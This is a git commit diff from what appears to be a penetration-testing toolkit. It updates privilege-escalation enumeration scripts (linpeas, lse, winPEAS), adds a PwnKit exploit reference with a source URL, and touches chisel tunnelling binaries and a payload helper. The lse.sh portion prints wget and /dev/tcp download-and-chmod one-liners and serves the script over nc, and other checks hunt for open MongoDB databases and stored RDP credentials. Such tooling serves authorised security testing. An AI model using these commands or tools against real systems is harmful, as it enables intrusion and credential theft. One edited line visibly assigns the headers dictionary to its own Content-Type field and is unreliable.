Project Update
This commit is contained in:
parent
f640b45acf
commit
1f55516c59
BIN
chisel64
BIN
chisel64
Binary file not shown.
@ -347,7 +347,7 @@ containerCheck() {
|
||||
# Are we inside kubenetes?
|
||||
if grep "/kubepod" /proc/1/cgroup -qa; then
|
||||
inContainer="1"
|
||||
containerType="kubentes"
|
||||
containerType="kubernetes"
|
||||
fi
|
||||
|
||||
# Are we inside LXC?
|
||||
|
||||
@ -86,6 +86,8 @@ class FileServerRequestHandler(BaseHTTPRequestHandler):
|
||||
if path in self.server.dumpRequests:
|
||||
headers["Access-Control-Allow-Origin"] = "*"
|
||||
|
||||
headers["Content-Length"] = len(data)
|
||||
|
||||
if len(headers) == 0:
|
||||
self.send_response(status_code)
|
||||
else:
|
||||
@ -149,11 +151,14 @@ class HttpFileServer(HTTPServer):
|
||||
if isinstance(data, str):
|
||||
data = data.encode("UTF-8")
|
||||
|
||||
# return 200 - OK and data
|
||||
headers = {
|
||||
"Access-Control-Allow-Origin": "*",
|
||||
}
|
||||
if mimeType:
|
||||
self.addRoute(name, lambda req: (200, data, { "Content-Type": mimeType }))
|
||||
else:
|
||||
self.addRoute(name, lambda req: (200, data))
|
||||
headers["Content-Type"] = headers
|
||||
|
||||
# return 200 - OK and data
|
||||
self.addRoute(name, lambda req: (200, data, headers))
|
||||
|
||||
def dumpRequest(self, name):
|
||||
self.dumpRequests.append(self.cleanPath(name))
|
||||
|
||||
3905
linpeas.sh
Executable file → Normal file
3905
linpeas.sh
Executable file → Normal file
File diff suppressed because one or more lines are too long
@ -1490,6 +1490,17 @@ exploit-db: https://www.exploit-db.com/exploits/41154
|
||||
EOF
|
||||
)
|
||||
|
||||
EXPLOITS_USERSPACE[((n++))]=$(cat <<EOF
|
||||
Name: ${txtgrn}[CVE-2021-4034]${txtrst} PwnKit
|
||||
Reqs: pkg=polkit|policykit-1,ver<=0.105-31
|
||||
Tags: ubuntu=10|11|12|13|14|15|16|17|18|19|20|21,debian=7|8|9|10|11,fedora,manjaro
|
||||
Rank: 1
|
||||
analysis-url: https://www.qualys.com/2022/01/25/cve-2021-4034/pwnkit.txt
|
||||
src-url: https://codeload.github.com/berdav/CVE-2021-4034/zip/main
|
||||
author: berdav
|
||||
EOF
|
||||
)
|
||||
|
||||
###########################################################
|
||||
## security related HW/kernel features
|
||||
###########################################################
|
||||
|
||||
10
lse.sh
10
lse.sh
@ -5,7 +5,7 @@
|
||||
# Author: Diego Blanco <diego.blanco@treitos.com>
|
||||
# GitHub: https://github.com/diego-treitos/linux-smart-enumeration
|
||||
#
|
||||
lse_version="3.7"
|
||||
lse_version="3.9"
|
||||
|
||||
#( Colors
|
||||
#
|
||||
@ -502,7 +502,8 @@ lse_serve() {
|
||||
cecho "${green} * ${white}wget ${reset} '$ip:$port' -O lse.sh; chmod 755 lse.sh\n"
|
||||
cecho "${green} * ${white}exec 3<>/dev/tcp/${reset}$ip/$port;printf '\\\\n'>&3;cat<&3>lse.sh;exec 3<&-;chmod 755 lse.sh\n"
|
||||
done
|
||||
nc -l -q0 -p "$port" < "$0" >/dev/null
|
||||
# try nc with '-N' (openbsd), then ncat and then use '-q0' (traditional)
|
||||
nc -l -N -p "$port" < "$0" >/dev/null 2>/dev/null || nc -l --send-only -p "$port" < "$0" >/dev/null 2>/dev/null || nc -l -q0 -p "$port" < "$0" >/dev/null
|
||||
}
|
||||
lse_header() {
|
||||
local id="$1"
|
||||
@ -1262,6 +1263,11 @@ lse_run_tests_software() {
|
||||
"Can we write to screen session sockets from other users?" \
|
||||
'find /run/screen -type s -writable -regex "/run/screen/S-.+/.+" ! -user $lse_user -exec ls -l {} +'
|
||||
|
||||
#check connection to mongoDB
|
||||
lse_test "sof170" "1" \
|
||||
"Can we access MongoDB databases without credentials?" \
|
||||
'echo "show dbs" | mongo --quiet | grep -E "(admin|config|local)"'
|
||||
|
||||
#sudo version - check to see if there are any known vulnerabilities with this
|
||||
lse_test "sof500" "2" \
|
||||
"Sudo version" \
|
||||
|
||||
2
util.py
2
util.py
@ -193,7 +193,7 @@ if __name__ == "__main__":
|
||||
output = set_exif_data(payload, _in, _out, tag)
|
||||
sys.stdout.buffer.write(output)
|
||||
sys.stdout.flush()
|
||||
elif command == "help":
|
||||
else:
|
||||
print("Usage: %s [command]" % bin)
|
||||
print("Available commands:")
|
||||
print(" help, getAddress, pad, exifImage")
|
||||
|
||||
BIN
win/chisel.exe
BIN
win/chisel.exe
Binary file not shown.
BIN
win/chisel64.exe
BIN
win/chisel64.exe
Binary file not shown.
@ -237,7 +237,7 @@ CALL :T_Progress 2
|
||||
:RemodeDeskCredMgr
|
||||
CALL :ColorLine " %E%33m[+]%E%97m Remote Desktop Credentials Manager"
|
||||
ECHO. [?] https://book.hacktricks.xyz/windows/windows-local-privilege-escalation#remote-desktop-credential-manager
|
||||
IF exist "%AppLocal%\Local\Microsoft\Remote Desktop Connection Manager\RDCMan.settings" ECHO.Found: RDCMan.settings in %AppLocal%\Local\Microsoft\Remote Desktop Connection Manager\RDCMan.settings, check for credentials in .rdg files
|
||||
IF exist "%LOCALAPPDATA%\Local\Microsoft\Remote Desktop Connection Manager\RDCMan.settings" ECHO.Found: RDCMan.settings in %AppLocal%\Local\Microsoft\Remote Desktop Connection Manager\RDCMan.settings, check for credentials in .rdg files
|
||||
ECHO.
|
||||
CALL :T_Progress 1
|
||||
|
||||
|
||||
BIN
win/winPEAS.exe
BIN
win/winPEAS.exe
Binary file not shown.
Binary file not shown.
Loading…
Reference in New Issue
Block a user